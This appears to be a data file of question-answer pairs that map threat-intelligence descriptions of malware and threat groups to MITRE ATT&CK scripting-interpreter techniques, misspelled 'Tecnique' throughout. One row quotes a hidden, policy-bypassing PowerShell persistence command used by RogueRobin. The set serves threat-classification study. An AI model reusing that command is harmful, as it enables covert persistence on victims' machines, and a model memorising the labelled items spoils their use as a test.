+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used PowerShell to load itself every time a user logs in to the system. ComRAT can execute PowerShell scripts loaded into memory or from the file system.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ConnectWise can be used to execute PowerShell commands on target machines.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can execute PowerShell commands via WMI.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis has a version written in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate shellcode outputs that execute via PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper uses PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has the ability to execute PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can use PowerShell scripts for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has used PowerShell to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GLASSTOKEN can use PowerShell for command execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can execute PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAMMERTOSS is known to use PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used PowerShell to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One version of Helminth uses a PowerShell script.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has used PowerShell to execute payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader has the ability to download and execute PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can execute PowerShell commands on the victim's machine.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has used PowerShell commands to download additional files.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI used PowerShell to download and execute a specific 64-bit version of the malware.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses PowerShell commands to download and execute payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has used PowerShell to establish persistence.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can use a PowerShell script to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has used PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used PowerShell commands embedded inside batch scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can execute PowerShell commands on a compromised machine.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use PowerShell commands to disable the network adapters on a victim machines.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can use PowerShell to set persistence.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito can launch PowerShell Scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The NETWIRE binary has been executed via PowerShell script.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY uses PowerShell to execute various commands, one to execute its payload.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSOURCE is a PowerShell backdoor.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS uses PowerShell for obfuscation and execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON is written in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER is written in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PS1 can utilize a PowerShell loader.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has used PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has used a PowerShell script to install a shim database.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop has the ability to use PowerShell scripts to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess is written in and executed via PowerShell without using powershell.exe.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerPunch has the ability to execute through PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower is a backdoor written in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit modules are written in and executed via PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerStallion uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige can use PowerShell for payload execution on targeted systems.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has a module for loading and executing PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has attempted to execute with PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has used Powershell scripts to deploy its ransomware.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses PowerShell scripts for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use PowerShell to download and execute payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has used PowerShell to delete volume shadow copies and download files.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can extract and execute PowerShell scripts from C2 communications.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT uses the PowerShell command Reflection.Assembly to load itself into memory to aid in execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates %APPDATA%\OneDrive.bat and saves the following string to it:powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHARPSTATS has the ability to employ a custom PowerShell script.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use PowerShell to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM can execute Powershell commands sent from its C2 server.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has used PowerShell to create a Meterpreter session.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to execute PowerShell commands on a compromised machine.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper has the ability to execute a PowerShell script to get information from the infected host.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage can execute arbitrary commands with PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can use a PowerShell script for second-stage execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Socksbot can write and execute PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has used PowerShell to execute its payload.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can use PowerShell to add files to the Windows Defender exclusions list.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has used PowerShell to download additional modules.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can use PowerShell to download files and execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can execute PowerShell scripts received from C2.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can execute PowerShell commands and scripts with the use of .NET DLL, `WoodyPowerSession`.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda uses PowerShell to download and execute the payload.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has executed PowerShell commands via auto-run registry key persistence.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can use AppleScript to inject malicious JavaScript into a browser.,"Tecnique: T1059.002 Command and Scripting Interpreter: AppleScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok uses AppleScript to create a login item for persistence.,"Tecnique: T1059.002 Command and Scripting Interpreter: AppleScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses AppleScript's osascript -e command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.,"Tecnique: T1059.002 Command and Scripting Interpreter: AppleScript, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.,"Tecnique: T1059.002 Command and Scripting Interpreter: AppleScript, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `xp_cmdshell` command in MS-SQL.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors ran a command script to set up persistence as a scheduled task named ""WinUpdate"", as well as other encoded commands from the command-line","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used batch scripts to perform reconnaissance.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used `cmd.exe` to execute commands on remote machines.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 uses cmd.exe to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. The group has also used macros to execute payloads.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader uses the Windows command ""cmd.exe"" /C whoami. The group also uses a tool to execute commands on remote computers.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used cmd.exe for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used the command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used cmd.exe /c to execute commands on remote machines.
+APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used cmd.exe for execution on compromised systems.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to cmd /C.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used batch scripts and the command-line interface for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used batch script files to automate execution and deployment of payloads.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used the Windows Command Shell and batch scripts for execution on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has executed ransomware using batch scripts deployed via GPO.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal has used macros in Word documents that would download a second stage if executed.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used various types of scripting to perform operations, including batch scripts.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has executed malicious .bat files containing PowerShell commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has leveraged `xp_cmdshell` and Windows Command Shell to execute commands on a compromised machine. FIN13 has also attempted to leverage the ‘xp_cmdshell’ SQL procedure to execute remote commands on internal MS-SQL servers.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used kill.bat script to disable security tools.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used the command prompt to launch commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities. FIN8 has also executed commands remotely via `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used cmd.exe likely as a password changing mechanism.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used the Windows command shell to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used `cmd.exe` to execute commands on the victim's machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used cmd.exe for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used batch scripts on victim's machines.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used batch scripts in its malware to install persistence mechanisms.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has executed Windows commands by using `cmd` and running batch scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
